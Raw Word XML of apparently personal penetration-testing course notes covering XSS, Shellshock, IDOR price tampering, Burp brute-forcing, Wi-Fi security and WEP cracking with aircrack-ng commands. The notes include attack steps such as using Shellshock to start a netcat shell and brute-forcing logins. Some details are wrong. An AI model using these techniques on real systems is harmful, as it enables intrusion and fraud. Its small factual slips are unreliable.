      <w:r w:rsidRPr="00EE5BC6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Based: enter the script in the URL. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5BC6" w:rsidRDefault="00EE5BC6" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003372B9" w:rsidRDefault="00EE5BC6" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A lot of browsers nowadays do not allow for scripts to be run automatically when browsing to a site. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003846AB" w:rsidRDefault="003846AB" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE5BC6" w:rsidRDefault="00EE5BC6" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Known Vulnerable Components</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5BC6" w:rsidRDefault="00EE5BC6" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Heartbleed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5BC6" w:rsidRPr="00EE5BC6" w:rsidRDefault="00EE5BC6" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shellshock: </w:t>
      </w:r>
      <w:r w:rsidR="00CC4F6B">
        <w:t xml:space="preserve">Change the http referrer. Enter the shellshock command to get /bin/bash and start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CC4F6B">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CC4F6B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4F6B" w:rsidRDefault="00CC4F6B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE5BC6" w:rsidRDefault="00CC4F6B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC4F6B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Indirect </w:t>
      </w:r>
      <w:r w:rsidR="000F7AF8">
        <w:t>Object Reference / I</w:t>
      </w:r>
      <w:r>
        <w:t>nsecure DOR.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC4F6B" w:rsidRDefault="00CC4F6B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Look for the POST http request in Burp, intercept the packet and then modify. Buy 10 tickets but change the price to 0. Need to look at the HTTP requests. Intercept and then change. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5BC6" w:rsidRDefault="00EE5BC6" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00631887" w:rsidRDefault="00631887" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Normally some </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t xml:space="preserve">sort of brute force. Using </w:t>
      </w:r>
      <w:r w:rsidR="00124068" w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> have a search for pages with "user" on them to try and locate a log in page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When you've found a page transfer it to "Intruder" tab. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Variety of different possible attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Set the first payload as Username and the 2nd payload as Passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Doing this brute force attack in </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will send 30,000,000+ combin</w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t xml:space="preserve">ations of username and password so it could take quite a while. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Check in Burp</w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Suite in case any password have been sent in clear</w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">text, </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> would mean you could run a sniffer to try and catch them rather than brute force.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Encoding &amp; Decoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When dealing with web application data is encoded in a certain way. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Base64 is a common method of encoding. Possible to use </w:t>
      </w:r>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidR="00124068" w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (again). Under the decoder tab it is possible to play around with encoding to see how it all works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Another thing to have a play around with is hashing. Try using the different hashes to see the results.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009606AB" w:rsidRDefault="009606AB" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Wireless Networking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The idea of wireless networking goes back a long way. Packets over the radio goes all the way back to ALOHA net, 1970/80s. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern wireless networking is known as Wi-Fi (Wireless Fidelity). 802.11 family of protocols defines </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> standard today.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>New 802.11 protocols are in development with faster speeds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uses an SSID to identify what network you're connecting to.  </w:t>
      </w:r>
      <w:r w:rsidR="00CE1E4B">
        <w:t xml:space="preserve">An SSID can be a maximum of 32 characters long. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Encryption Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="000748A0" w:rsidRDefault="003B567C" w:rsidP="000748A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000748A0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WEP, WPA, WPA2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WEP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Wired </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Equivalent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Privacy, Very </w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t>early</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, weak, protocol. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t>cracked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t>easily</w:t>
      </w:r>
      <w:r>
        <w:t>. Stream cipher. It h</w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t>ad a vulnerability in the algori</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thm which enabled it get hacked </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>fairly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> easily when enough data is collected. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WPA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> protected access. Quickly deployed as an </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>intermediary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> measure because they know WEP had vulnerabilities. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only 10 or 24 character passcode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WPA2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - The true successor to WEP much more secure. Uses a pre-shared key of variable length and complexity. </w:t>
      </w:r>
      <w:r w:rsidR="00CE1E4B">
        <w:t xml:space="preserve">Also uses Temporal Key Integrity Protocol, TKIP, which forces a key exchange every 10,000 packets or so. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Open network. Zero </w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t>trust network</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Enterprise Encryption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Authenticate with a username and password. Typically will be a RADIUS or AAA server somewhere in the network. Prov</w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t>ides accountability and logging for auditing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> protected set-up creates vulnerabilities in WPA and WPA2. Funnily enough WEP is ok with </w:t>
      </w:r>
      <w:r>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> protect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Wi-Fi Hotspots</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There's a number of ways of collecting information on </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hotspots and access points. Whether you're in the parking lot or sat inside the building attempting to jump on a </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using normal OS you can find </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> networks that are </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>broadcasting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> their SSID. It will sometimes show hidden SSIDs also.</w:t>
      </w:r>
      <w:r w:rsidR="00CE1E4B">
        <w:t xml:space="preserve"> The process of hiding your SSID is known as “</w:t>
      </w:r>
      <w:r w:rsidR="00CE1E4B" w:rsidRPr="00CE1E4B">
        <w:t>SSID Cloaking”</w:t>
      </w:r>
      <w:r w:rsidR="00CE1E4B">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> There is normally an icon which will tell you if the network is protected by encryption also.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>KisMAC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a tool to find networks that are </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>broadcasting</w:t>
      </w:r>
      <w:r>
        <w:t>. Doesn't actually work very well any more.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NetStumbler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a windows </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>equivalent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r w:rsidR="003B567C" w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Explorer on MAC</w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>rovides some good information about the network you can connect to. Can be good for trying to capture the information on an intermittent AP that's up and down.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The tools, although they do pretty much the same as using the OS, will try and determine the name of any hidden SSID. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Breaking WEP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gather a whole lot of data to be able to do this WEP </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>breaking</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>AirCrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-ng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will help </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the encryption. A function inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will show the different interfaces installed on this system that are enabled to allow </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>Wi-Fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-ng start wlan0</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- runs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>airdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-ng mon0</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- this will monitor and dump any information it finds so that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-ng [options] &lt;.cap / .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ivs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> file&gt;</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- starts </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Really, to run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> you will need a file which is what </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>airdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will provide for you often in the 100s of MB if not GBs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
